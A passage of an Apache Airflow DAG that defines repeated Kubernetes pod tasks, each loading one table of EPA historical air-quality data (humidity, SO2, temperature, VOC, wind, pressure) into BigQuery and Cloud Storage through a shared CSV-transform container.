"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pressure_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# rh_and_dp_daily_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
rh_and_dp_daily_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="rh_and_dp_daily_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_daily_summary.target_gcs_path }}",
        # Fixed: was "... - rh_and_dp_daily_summaries" (plural), inconsistent
        # with task_id and with every sibling task's "<task_id>" naming pattern.
        "PIPELINE_NAME": "epa_historical_air_quality - rh_and_dp_daily_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# rh_and_dp_hourly_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
rh_and_dp_hourly_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="rh_and_dp_hourly_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.rh_and_dp_hourly_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - rh_and_dp_hourly_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# so2_daily_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
so2_daily_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="so2_daily_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.so2_daily_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.so2_daily_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.so2_daily_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.so2_daily_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.so2_daily_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - so2_daily_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# so2_hourly_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
so2_hourly_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="so2_hourly_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.so2_hourly_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - so2_hourly_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# temperature_daily_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
temperature_daily_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="temperature_daily_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.temperature_daily_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - temperature_daily_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# temperature_hourly_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
temperature_hourly_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="temperature_hourly_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.temperature_hourly_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - temperature_hourly_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# voc_daily_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
voc_daily_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="voc_daily_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.voc_daily_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.voc_daily_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.voc_daily_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.voc_daily_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.voc_daily_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - voc_daily_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# voc_hourly_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
voc_hourly_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="voc_hourly_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.voc_hourly_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - voc_hourly_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# wind_daily_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
wind_daily_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="wind_daily_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.wind_daily_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.wind_daily_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.wind_daily_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.wind_daily_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.wind_daily_summary.target_gcs_path }}",
        # Fixed: was "... - wind_daily_summaries" (plural), inconsistent with
        # task_id and with every sibling task's "<task_id>" naming pattern.
        "PIPELINE_NAME": "epa_historical_air_quality - wind_daily_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod.
# Launches the shared run_csv_transform_kub container on the
# "epa-hist-air-quality" GKE cluster; env_vars point the container at the
# wind_hourly_summary source CSV and at the BigQuery table / GCS path
# load targets (all values resolved from Airflow Variables at render time).
wind_hourly_summary = kubernetes_engine.GKEStartPodOperator(
    task_id="wind_hourly_summary",
    startup_timeout_seconds=600,
    name="load_data",
    namespace="default",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    cluster_name="epa-hist-air-quality",
    image_pull_policy="Always",
    image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
    env_vars={
